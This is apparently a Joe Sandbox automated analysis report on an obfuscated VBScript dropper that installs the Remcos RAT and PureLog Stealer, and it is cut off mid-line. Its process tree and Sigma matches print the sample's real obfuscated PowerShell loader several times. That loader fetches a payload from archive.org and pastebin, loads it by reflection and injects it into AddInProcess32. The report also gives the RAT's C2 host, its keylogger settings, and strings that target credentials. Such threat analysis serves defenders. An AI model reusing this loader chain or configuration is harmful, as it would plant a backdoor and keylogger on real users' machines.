Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OIQ1ybtQdW.vbs

Overview

General Information

Sample name:OIQ1ybtQdW.vbs
renamed because original name is a hash value
Original sample name:8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs
Analysis ID:1523833
MD5:4a31a1de3d99c80d908ddda051e2f761
SHA1:302e19edb2c96cc78cb866c2d78d7f2fc77e8297
SHA256:8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "TsosT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DCR6HW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x144b8:$a1: Remcos restarted by watchdog!
          • 0x14a30:$a3: %02i:%02i:%02i:%03i
          0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              11.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                11.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  11.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  11.2.AddInProcess32.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 16 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, Comm
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250Z
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250Z
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 